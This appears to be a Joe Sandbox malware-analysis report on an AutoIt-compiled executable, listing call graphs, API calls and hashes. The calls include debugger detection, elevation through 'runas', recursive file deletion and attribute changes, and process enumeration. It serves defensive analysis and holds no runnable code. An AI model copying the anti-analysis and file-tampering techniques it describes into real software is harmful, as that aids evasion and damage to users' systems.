100465->100466 100467 d9972d 100466->100467 100468 d99735 100467->100468 100469 d99746 SetFilePointerEx 100467->100469 100482 d8f669 20 API calls __dosmaperr 100468->100482 100470 d9973a 100469->100470 100471 d9975e GetLastError 100469->100471 100470->100460 100483 d8f633 20 API calls __dosmaperr 100471->100483 100474->100445 100475->100459 100476->100461 100477->100460 100478->100459 100479->100449 100480->100453 100481->100459 100482->100470 100483->100470 100484 d70e6f 100485 d70e83 100484->100485 100491 d713d5 100484->100491 100486 d70e95 100485->100486 100489 d8016b 8 API calls 100485->100489 100487 db55d0 100486->100487 100488 d6b3fe 8 API calls 100486->100488 100490 d70eee 100486->100490 100518 dd1a29 8 API calls 100487->100518 100488->100486 100489->100486 100492 d72ad0 254 API calls 100490->100492 100510 d7044d ISource 100490->100510 100491->100486 100494 d6be6d 8 API calls 100491->100494 100516 d70326 ISource 100492->100516 100494->100486 100495 d8016b 8 API calls 100495->100516 100496 db62cf 100522 dd3ef6 81 API calls __wsopen_s 100496->100522 100497 d71e00 40 API calls 100497->100516 100498 d71645 100503 d6be6d 8 API calls 100498->100503 100498->100510 100500 db61fe 100521 dd3ef6 81 API calls __wsopen_s 100500->100521 100501 d6be6d 8 API calls 100501->100516 100502 db5c7f 100507 d6be6d 8 API calls 100502->100507 100502->100510 100503->100510 100507->100510 100508 d805d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100508->100516 100509 d6bf07 8 API calls 100509->100516 100511 d70a5e ISource 100520 dd3ef6 81 API calls __wsopen_s 100511->100520 100512 db60b9 100519 dd3ef6 81 API calls __wsopen_s 100512->100519 100513 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 100513->100516 100515 d80433 29 API calls pre_c_initialization 100515->100516 100516->100495 100516->100496 100516->100497 100516->100498 100516->100500 100516->100501 100516->100502 100516->100508 100516->100509 100516->100510 100516->100511 100516->100512 100516->100513 100516->100515 100517 d71940 254 API calls 2 library calls 100516->100517 100517->100516 100518->100510 100519->100511 100520->100510 100521->100510 100522->100510 100523 d715af 100524 d7e34f 8 API calls 100523->100524 100525 d715c5 100524->100525 100530 d7e3b3 100525->100530 100527 d715ef 100528 db61ab 100527->100528 100542 dd3ef6 81 API calls __wsopen_s 100527->100542 100531 d67a14 8 API calls 100530->100531 100532 d7e3ea 100531->100532 100533 d6b25f 8 API calls 100532->100533 100536 d7e41b 100532->100536 100534 dbe4e4 100533->100534 100535 d67af4 8 API calls 100534->100535 100537 dbe4ef 100535->100537 100536->100527 100543 d7e73b 39 API calls 100537->100543 100539 dbe502 100540 d6b3fe 8 API calls 100539->100540 100541 dbe506 100539->100541 100540->100541 100541->100541 100542->100528 100543->100539 100544 da27a2 100547 d62a52 100544->100547 100548 d62a91 mciSendStringW 100547->100548 100549 da39f4 DestroyWindow 100547->100549 100550 d62aad 100548->100550 100551 d62d08 100548->100551 100560 da3a00 100549->100560 100552 d62abb 100550->100552 100550->100560 100551->100550 100553 d62d17 UnregisterHotKey 100551->100553 100579 d62e70 100552->100579 100553->100551 100555 da3a1e FindClose 100555->100560 100557 da3a45 100561 da3a69 100557->100561 100562 da3a58 FreeLibrary 100557->100562 100558 d67953 CloseHandle 100558->100560 100559 d62ad0 100559->100561 100567 d62ade 100559->100567 100560->100555 100560->100557 100560->100558 100563 da3a7d VirtualFree 100561->100563 100568 d62b4b 100561->100568 100562->100557 100563->100561 100564 d62b3a CoUninitialize 100564->100568 100565 da3ac5 100571 da3ad4 ISource 100565->100571 100585 dd3c45 6 API calls ISource 100565->100585 100567->100564 100568->100565 100569 d62b56 100568->100569 100583 d62f86 VirtualFreeEx CloseHandle 100569->100583 100575 da3b63 100571->100575 100586 dc6d63 8 API calls ISource 100571->100586 100573 d62b7c 100573->100571 100574 d62c61 100573->100574 100574->100575 100576 d62caf 100574->100576 100575->100575 100576->100575 100584 d62eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 100576->100584 100578 d62d03 100580 d62e7d 100579->100580 100581 d62ac2 100580->100581 100587 dc78b9 8 API calls 100580->100587 100581->100557 100581->100559 100583->100573 100584->100578 100585->100565 100586->100571 100587->100580 100588 d6f48c 100591 d6ca50 100588->100591 100592 d6ca6b 100591->100592 100593 db14af 100592->100593 100594 db1461 100592->100594 100616 d6ca90 100592->100616 100632 de61ff 254 API calls 2 library calls 100593->100632 100597 db146b 100594->100597 100600 db1478 100594->100600 100594->100616 100630 de6690 254 API calls 100597->100630 100611 d6cd60 100600->100611 100631 de6b2d 254 API calls 2 library calls 100600->100631 100603 db1742 100603->100603 100607 d6cd8e 100608 db168b 100634 de6569 81 API calls 100608->100634 100611->100607 100635 dd3ef6 81 API calls __wsopen_s 100611->100635 100612 d6bdc1 39 API calls 100612->100616 100613 d6b3fe 8 API calls 100613->100616 100616->100607 100616->100608 100616->100611 100616->100612 100616->100613 100617 d7e781 39 API calls 100616->100617 100618 d6cf30 39 API calls 100616->100618 100619 d702f0 254 API calls 100616->100619 100620 d6be6d 8 API calls 100616->100620 100622 d7e73b 39 API calls 100616->100622 100623 d7aa19 254 API calls 100616->100623 100624 d805d2 5 API calls __Init_thread_wait 100616->100624 100625 d7bbd2 8 API calls 100616->100625 100626 d80433 29 API calls __onexit 100616->100626 100627 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100616->100627 100628 d7f4ed 81 API calls 100616->100628 100629 d7f354 254 API calls 100616->100629 100633 dbff4f 8 API calls 100616->100633 100617->100616 100618->100616 100619->100616 100620->100616 100622->100616 100623->100616 100624->100616 100625->100616 100626->100616 100627->100616 100628->100616 100629->100616 100630->100600 100631->100611 100632->100616 100633->100616 100634->100611 100635->100603 100636 d7230c 100643 d72315 __fread_nolock 100636->100643 100637 d68e70 52 API calls 100637->100643 100638 db7487 100648 d6662b 8 API calls __fread_nolock 100638->100648 100639 d71fa7 __fread_nolock 100641 db7493 100641->100639 100646 d6be6d 8 API calls 100641->100646 100642 d72366 100644 d67cb3 8 API calls 100642->100644 100643->100637 100643->100638 100643->100639 100643->100642 100645 d8016b 8 API calls 100643->100645 100647 d8019b 8 API calls 100643->100647 100644->100639 100645->100643 100646->100639 100647->100643 100648->100641

                                                                                              Executed Functions

                                                                                              Function 00D65D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 515 d65d78-d65de7 call d6bf07 GetVersionExW call d684b7 520 da4f0c-da4f1f 515->520 521 d65ded 515->521 523 da4f20-da4f24 520->523 522 d65def-d65df1 521->522 524 da4f4b 522->524 525 d65df7-d65e56 call d696d9 call d679ed 522->525 526 da4f26 523->526 527 da4f27-da4f33 523->527 531 da4f52-da4f5e 524->531 540 da50ad-da50b4 525->540 541 d65e5c-d65e5e 525->541 526->527 527->523 529 da4f35-da4f37 527->529 529->522 530 da4f3d-da4f44 529->530 530->520 533 da4f46 530->533 534 d65ecc-d65ee6 GetCurrentProcess IsWow64Process 531->534 533->524 536 d65f45-d65f4b 534->536 537 d65ee8 534->537 539 d65eee-d65efa 536->539 537->539 542 d65f00-d65f0f LoadLibraryA 539->542 543 da50f2-da50f6 GetSystemInfo 539->543 546 da50b6 540->546 547 da50d4-da50d7 540->547 544 d65e64-d65e67 541->544 545 da4fae-da4fc1 541->545 550 d65f11-d65f1f GetProcAddress 542->550 551 d65f4d-d65f57 GetSystemInfo 542->551 544->534 552 d65e69-d65eab 544->552 553 da4fea-da4fec 545->553 554 da4fc3-da4fcc 545->554 555 da50bc 546->555 548 da50d9-da50e8 547->548 549 da50c2-da50ca 547->549 548->555 558 da50ea-da50f0 548->558 549->547 550->551 559 d65f21-d65f25 GetNativeSystemInfo 550->559 560 d65f27-d65f29 551->560 552->534 561 d65ead-d65eb0 552->561 556 da4fee-da5003 553->556 557 da5021-da5024 553->557 562 da4fd9-da4fe5 554->562 563 da4fce-da4fd4 554->563 555->549 564 da5010-da501c 556->564 565 da5005-da500b 556->565 566 da505f-da5062 557->566 567 da5026-da5041 557->567 558->549 559->560 568 d65f32-d65f44 560->568 569 d65f2b-d65f2c FreeLibrary 560->569 570 d65eb6-d65ec0 561->570 571 da4f63-da4f6d 561->571 562->534 563->534 564->534 565->534 566->534 576 da5068-da508f 566->576 572 da504e-da505a 567->572 573 da5043-da5049 567->573 569->568 570->531 577 d65ec6 570->577 574 da4f6f-da4f7b 571->574 575 da4f80-da4f8a 571->575 572->534 573->534 574->534 578 da4f8c-da4f98 575->578 579 da4f9d-da4fa9 575->579 580 da509c-da50a8 576->580 581 da5091-da5097 576->581 577->534 578->534 579->534 580->534 581->534
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00D65DA7
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              • GetCurrentProcess.KERNEL32(?,00DFDC2C,00000000,?,?), ref: 00D65ED3
                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D65EDA
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D65F05
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D65F17
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D65F25
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D65F2C
                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00D65F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                              • API String ID: 3290436268-3101561225
                                                                                              • Opcode ID: df05862b0e44998d76a2901b3c1b947bc2f8fc97f926dc7b3cbc895c30ca0193
                                                                                              • Instruction ID: 73ee32cd28ae86a407dc03fe26e8a7c46c53acfa27e257c35341c714c55c18e3
                                                                                              • Opcode Fuzzy Hash: df05862b0e44998d76a2901b3c1b947bc2f8fc97f926dc7b3cbc895c30ca0193
                                                                                              • Instruction Fuzzy Hash: C1A1D93190A7DBCFCB11CB7A7C4C1A97F956B66300B0858ADE6C1B3266C279854CCB76
                                                                                              Function 00D63312 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D632EF,?), ref: 00D63342
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D632EF,?), ref: 00D63355
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E32418,00E32400,?,?,?,?,?,?,00D632EF,?), ref: 00D633C1
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                                • Part of subcall function 00D641E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D633E9,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D64227
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D63442
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00DA3C8A
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00DA3CCB
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E231F4,00E32418,?,?,?,?,?,?,?,00D632EF), ref: 00DA3D54
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DA3D5B
                                                                                                • Part of subcall function 00D6345A: GetSysColorBrush.USER32(0000000F), ref: 00D63465
                                                                                                • Part of subcall function 00D6345A: LoadCursorW.USER32(00000000,00007F00), ref: 00D63474
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(00000063), ref: 00D6348A
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(000000A4), ref: 00D6349C
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(000000A2), ref: 00D634AE
                                                                                                • Part of subcall function 00D6345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D634C6
                                                                                                • Part of subcall function 00D6345A: RegisterClassExW.USER32(?), ref: 00D63517
                                                                                                • Part of subcall function 00D6353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D63568
                                                                                                • Part of subcall function 00D6353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D63589
                                                                                                • Part of subcall function 00D6353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D6359D
                                                                                                • Part of subcall function 00D6353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D635A6
                                                                                                • Part of subcall function 00D638F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D639C3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                              • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                              • API String ID: 683915450-3328958999
                                                                                              • Opcode ID: 35be81d72e2b82e19dd5c1a590f36c2e3a5968afae949d69724beda81a9d136a
                                                                                              • Instruction ID: b6cbe1b064e31b3b8bfbc617e405f65d7a71a38ae86f58414b8838233fb1f1e1
                                                                                              • Opcode Fuzzy Hash: 35be81d72e2b82e19dd5c1a590f36c2e3a5968afae949d69724beda81a9d136a
                                                                                              • Instruction Fuzzy Hash: C551E430108345AFC705EF61AC0ADAEBFA6DF85714F04542DF5D1A61A2CF249A8DD772
                                                                                              Function 00DD9F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 646 dd9f9f-dd9fc7 FindFirstFileW 647 dd9fc9-dd9fde call d855c2 646->647 648 dda03a-dda045 FindClose 646->648 656 dda028-dda038 FindNextFileW 647->656 657 dd9fe0-dd9ff5 call d855c2 647->657 649 dda04b-dda05e FindFirstFileW 648->649 650 dda0e2 648->650 653 dda0d9 649->653 654 dda060-dda066 649->654 655 dda0e4-dda0e8 650->655 658 dda0db-dda0dc FindClose 653->658 659 dda069-dda070 654->659 656->647 656->648 657->656 665 dd9ff7-dda020 GetFileAttributesW SetFileAttributesW 657->665 658->650 661 dda0c7-dda0d7 FindNextFileW 659->661 662 dda072-dda087 call d855c2 659->662 661->653 661->659 662->661 669 dda089-dda09e call d855c2 662->669 667 dda0eb-dda0f4 FindClose 665->667 668 dda026 665->668 667->655 668->656 669->661 672 dda0a0-dda0be SetCurrentDirectoryW call dd9f9f 669->672 675 dda0f6-dda0f8 672->675 676 dda0c0-dda0c5 SetCurrentDirectoryW 672->676 675->658 676->661
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,76228FB0,?,00000000), ref: 00DD9FC0
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DD9FFE
                                                                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00DDA018
                                                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00DDA030
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA03B
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DDA057
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DDA0A7
                                                                                              • SetCurrentDirectoryW.KERNEL32(00E27B94), ref: 00DDA0C5
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDA0CF
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA0DC
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA0EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: 79248e90d22b71605df1539e17a0a26d8d831aea7865b610398581549a81ea3d
                                                                                              • Instruction ID: 2facbde3321af7cba488acf7dcd7c52a426891576e10ba4b9b39825a0bc23f55
                                                                                              • Opcode Fuzzy Hash: 79248e90d22b71605df1539e17a0a26d8d831aea7865b610398581549a81ea3d
                                                                                              • Instruction Fuzzy Hash: 9131C3326003196FDF10AFB8EC49AFE73AEAF05360F188096E555E2290DB34DE44DA75
                                                                                              Function 00DCD836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2510 dcd836-dcd894 call d6bf07 * 3 call d6557e * 2 call dce958 call dce9c5 2525 dcd89f-dcd8a9 call dce9c5 2510->2525 2526 dcd896-dcd89a call d665a4 2510->2526 2530 dcd8ab-dcd8af call d665a4 2525->2530 2531 dcd8b4-dcd8f2 call d6bf07 * 2 call d6694e FindFirstFileW 2525->2531 2526->2525 2530->2531 2539 dcd8f8 2531->2539 2540 dcda23-dcda2a FindClose 2531->2540 2542 dcd8fe-dcd900 2539->2542 2541 dcda2d-dcda5b call d6bd2c * 5 2540->2541 2542->2540 2544 dcd906-dcd90d 2542->2544 2546 dcd9ef-dcda02 FindNextFileW 2544->2546 2547 dcd913-dcd979 call d6b25f call dcdf85 call d6bd2c call d67af4 call d665a4 call dcdc8e 2544->2547 2546->2542 2550 dcda08-dcda0d 2546->2550 2569 dcd99f-dcd9a3 2547->2569 2570 dcd97b-dcd97e 2547->2570 2550->2542 2573 dcd9a5-dcd9a8 2569->2573 2574 dcd9d1-dcd9d7 call dcda5c 2569->2574 2571 dcd984-dcd99b call d7e2e5 2570->2571 2572 dcda12-dcda21 FindClose call d6bd2c 2570->2572 2581 dcd9ad-dcd9b6 MoveFileW 2571->2581 2587 dcd99d DeleteFileW 2571->2587 2572->2541 2576 dcd9b8-dcd9c8 call dcda5c 2573->2576 2577 dcd9aa 2573->2577 2583 dcd9dc 2574->2583 2576->2572 2588 dcd9ca-dcd9cf DeleteFileW 2576->2588 2577->2581 2585 dcd9df-dcd9e1 2581->2585 2583->2585 2585->2572 2589 dcd9e3-dcd9eb call d6bd2c 2585->2589 2587->2569 2588->2585 2589->2546
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCD8E2
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DCD99D
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DCD9B0
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DCD9CD
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00DCD9F7
                                                                                                • Part of subcall function 00DCDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00DCD9DC,?,?), ref: 00DCDA72
                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00DCDA13
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDA24
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1946585618-1173974218
                                                                                              • Opcode ID: da01ab6902453fb94428cacbe648eaf45b74e4d568051194a2cfa1a316720c1d
                                                                                              • Instruction ID: ce4b044f2839c9b59fc96b7db943a673fb92d6e564e84fc97548791dff0806dd
                                                                                              • Opcode Fuzzy Hash: da01ab6902453fb94428cacbe648eaf45b74e4d568051194a2cfa1a316720c1d
                                                                                              • Instruction Fuzzy Hash: 8A61093180514EABCF05EBA0DE52EEDB7B6AF15310F244069E446B71A1EB319F49CB70
                                                                                              Function 00DCDB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCDBE0
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00DCDC30
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DCDC41
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDC58
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDC61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 3bf752e11f4601566ee81b43644a7e93574cf27781929174f3523d0c461a50b6
                                                                                              • Instruction ID: ad2e20ec5d7bcafc9db9111ada83a90202703b1173ef20a417110d7ba7211af1
                                                                                              • Opcode Fuzzy Hash: 3bf752e11f4601566ee81b43644a7e93574cf27781929174f3523d0c461a50b6
                                                                                              • Instruction Fuzzy Hash: DC316F310083859BC300EB64DC959AFB7EAAE95310F44492EF4D2931A1EB60DA09CBB6
                                                                                              Function 00DCDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DCDCC1
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DCDCCF
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DCDCEF
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00DCDD9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: 4af48224fcd1a0770e421434882ddb2632cf4e3de600b52b493835113defdba1
                                                                                              • Instruction ID: 29b451c5006fa0a99fa23c7ae7f53bc1cd6ca7f8c85d49b51803921cfdc03087
                                                                                              • Opcode Fuzzy Hash: 4af48224fcd1a0770e421434882ddb2632cf4e3de600b52b493835113defdba1
                                                                                              • Instruction Fuzzy Hash: 79316A715083419BC301EF60DC85BABBBE9EF98350F04092DF586C71A1EB719985CBB2
                                                                                              Function 00DCE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00DA4686), ref: 00DCE397
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DCE3A6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCE3B7
                                                                                              • FindClose.KERNELBASE(00000000), ref: 00DCE3C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
